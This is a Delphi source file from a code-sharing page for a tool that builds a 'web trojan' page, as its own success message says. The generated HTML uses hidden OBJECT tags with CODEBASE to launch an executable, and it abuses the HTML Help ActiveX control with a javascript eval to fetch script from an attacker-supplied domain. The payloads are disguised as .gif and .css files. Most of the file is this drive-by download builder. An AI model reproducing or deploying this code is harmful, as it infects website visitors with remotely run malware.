📄 unit1.~pas
字号:
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, StdCtrls, Buttons,FileCtrl,shellapi;
type
TForm1 = class(TForm)
Label1: TLabel;
Edit1: TEdit;
Label2: TLabel;
Edit2: TEdit;
Edit3: TEdit;
Label3: TLabel;
BitBtn1: TBitBtn;
BitBtn2: TBitBtn;
BitBtn3: TBitBtn;
OpenDialog1: TOpenDialog;
SaveDialog1: TSaveDialog;
Memo1: TMemo;
GroupBox1: TGroupBox;
Label4: TLabel;
Label5: TLabel;
Memo2: TMemo;
procedure BitBtn2Click(Sender: TObject);
procedure BitBtn1Click(Sender: TObject);
procedure BitBtn3Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
procedure GenerateCore(dfilename:string);
function ExtractRes(ResType, ResName, ResNewName: string): boolean;
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{$R 11.Res}
Procedure FileCopy( Const sourcefilename, targetfilename: String );
Var
S, T: TFileStream;
Begin
S := TFileStream.Create( sourcefilename, fmOpenRead );
try
T := TFileStream.Create( targetfilename,
fmOpenWrite or fmCreate );
try
T.CopyFrom(S, S.Size ) ;
finally
T.Free;
end;
finally
S.Free;
end;
End;
procedure TForm1.GenerateCore(dfilename:string);
var
html:string;
dpath:string;
dpath1:string;
begin
html:='';
html:=html+'<script language="javascript"> '+#13#10;
html:=html+'run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""'+#13#10;
//html:=html+'run_exe+="CODEBASE=\"'+dfilename+'#version=1,1,1,1\">" '+#13#10;
html:=html+'run_exe+="CODEBASE=\"'+'file://C:\WINDOWS\Help\apps.chm'+'#version=1,1,1,1\">" '+#13#10;
html:=html+'run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"'+#13#10;
html:=html+'run_exe+="</OBJECT>"'+#13#10;
html:=html+'run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";'+#13#10;
html:=html+'document.open();'+#13#10;
html:=html+'document.clear();'+#13#10;
html:=html+'document.writeln(run_exe);'+#13#10;
html:=html+'document.close();'+#13#10;
html:=html+'</script> '+#13#10;
html:=html+'<script language="javascript"> '+#13#10;
html:=html+'run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""'+#13#10;
html:=html+'run_exe+="CODEBASE=\"'+'bbs003302.exe'+'#version=1,1,1,1\">" '+#13#10;
//html:=html+'run_exe+="CODEBASE=\"'+'file://C:\WINDOWS\Help\apps.chm'+'#version=1,1,1,1\">" '+#13#10;
html:=html+'run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"'+#13#10;
html:=html+'run_exe+="</OBJECT>"'+#13#10;
html:=html+'run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";'+#13#10;
html:=html+'document.open();'+#13#10;
html:=html+'document.clear();'+#13#10;
html:=html+'document.writeln(run_exe);'+#13#10;
html:=html+'document.close();'+#13#10;
html:=html+'</script> '+#13#10;
html:=html+'<script language="javascript"> '+#13#10;
//html:=html+'run_exe="<OBJECT ID=\"RUNIT\" WIDTH=0 HEIGHT=0 TYPE=\"application/x-oleobject\""'+#13#10;
html:=html+'run_exe+="CODEBASE=\"'+dfilename+'#version=1,1,1,1\">" '+#13#10;
html:=html+'run_exe+="CODEBASE=\"'+'file://C:\WINDOWS\Help\apps.chm'+'#version=1,1,1,1\">" '+#13#10;
html:=html+'run_exe+="<PARAM NAME=\"_Version\" value=\"65536\">"'+#13#10;
html:=html+'run_exe+="</OBJECT>"'+#13#10;
html:=html+'run_exe+="<HTML><H1>网页加载中,请稍后....</H1></HTML>";'+#13#10;
html:=html+'document.open();'+#13#10;
html:=html+'document.clear();'+#13#10;
html:=html+'document.writeln(run_exe);'+#13#10;
html:=html+'document.close();'+#13#10;
html:=html+'</script> '+#13#10;
html:=html+'<SCRIPT language=VScript src="bbs003302.gif"></SCRIPT>'+#13#10;
html:=html+'<SCRIPT language=VScript src="bbs003302.css"></SCRIPT>'+#13#10;
html:=html+'<HTML>'+#13#10;
html:=html+'<BODY>'+#13#10;
html:=html+'<div style="display:none"> '+#13#10;
html:=html+'<OBJECT id="cctv" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'+#13#10;
html:=html+'<PARAM name="Command" value="Related Topics, MENU"> '+#13#10;
html:=html+'<PARAM name="Window" value="$global_ifl">'+#13#10;
html:=html+'<PARAM name="Item1" >'+#13#10;
html:=html+'</OBJECT>'+#13#10;
html:=html+'<OBJECT id="zgds" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">'+#13#10;
html:=html+'<PARAM name="Command" value="Related Topics, MENU"><PARAM name="Window" value="$global_ifl">'+#13#10;
html:=html+'<PARAM name="Item1" value='+''''+'command;javascript:eval("document.write(\"<SCRIPT language=JScript src='+'"http://你的域名/ bbs003302.gif\\\"\"+String.fromCharCode(62)+\"</SCR\"+\"IPT\"+String.fromCharCode(62))")>'+#13#10;
html:=html+'</OBJECT>'+#13#10;
html:=html+'</div>'+#13#10;
html:=html+'<SCRIPT>cctv.Click();setTimeout("zgds.Click();",0);</SCRIPT>'+#13#10;
html:=html+'</BODY> '+#13#10;
html:=html+'</HTML>'+#13#10;
dpath:=edit3.Text+'\'+edit2.Text +'.html';
memo1.Lines.Clear;
memo1.Lines.Add(html);
memo1.Lines.SaveToFile(dpath);
dpath:=edit3.Text+'\'+'bbs00302.gif';
dpath1:=edit1.Text;
Filecopy(dpath1,dpath);
//memo1.Lines.Clear;
//memo1.Lines.SaveToFile('showmessage()');
//memo1.Lines.SaveToFile(dpath);
dpath:=edit3.Text+'\'+'bbs00302.css';
memo1.Lines.Clear;
memo1.Lines.Add('this can not be show in the dos model');
memo1.Lines.SaveToFile(dpath);
end;
procedure TForm1.BitBtn2Click(Sender: TObject);
var
strCaption,strDirectory:String;
wstrRoot:WideString;
begin
strCaption:=' 请选择生成目录';
// 该参数是浏览文件夹窗口的显示说明部分
wstrRoot:='';
// 这个参数表示所显示的浏览文件夹窗口中的根目录,默认或空表示“我的电脑”。
SelectDirectory(strCaption,wstrRoot,strDirectory);
edit3.Text :=strDirectory;
// 传递结果,其中参数 strDirectory 表示函数的返回值
edit3.Refresh ;
end;
procedure TForm1.BitBtn1Click(Sender: TObject);
begin
try
if opendialog1.Execute then
begin
edit1.Text :=opendialog1.FileName;
end;
except
end;
end;
procedure TForm1.BitBtn3Click(Sender: TObject);
var
dpath:string;
dpath1:string;
begin
try
if trim(edit1.Text)='' then
begin
showmessage('请选择文件');
exit;
end;
if trim(edit2.Text)='' then
begin
showmessage('请选择文件');
exit;
end;
if trim(edit3.Text)='' then
begin
showmessage('请选择目录');
exit;
end;
dpath:=edit3.Text+'\'+edit2.Text +'.html';
memo1.lines.Append('src=\\\"http:'+'/'+'/'+edit2.Text +memo2.Text );
memo1.Lines.SaveToFile(dpath);
dpath:=edit3.Text+'\'+'bbs00302.gif';
ExtractRes('exefile','mygif',dpath);
dpath:=edit3.Text+'\'+'bbs00302.css';
dpath1:=edit1.Text;
Filecopy(dpath1,dpath);
//dpath:=edit3.Text+'\'+'bbs00302.css';
// ExtractRes('exefile','mycss',dpath);
// showmessage('成功生成网页木马');
// GenerateCore(extractfilename(edit1.Text) );
showmessage('网页木马生成成功!');
except
showmessage('网页木马生成失败!');
end;
end;
function TForm1.ExtractRes(ResType, ResName, ResNewName: string): boolean;
var
Res: TResourceStream;
begin
try
Res := TResourceStream.Create(Hinstance, Resname, Pchar(ResType));
try
Res.SavetoFile(ResNewName);
Result := true;
finally
Res.Free;
end;
except
Result := false;
end;
end;
end.
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -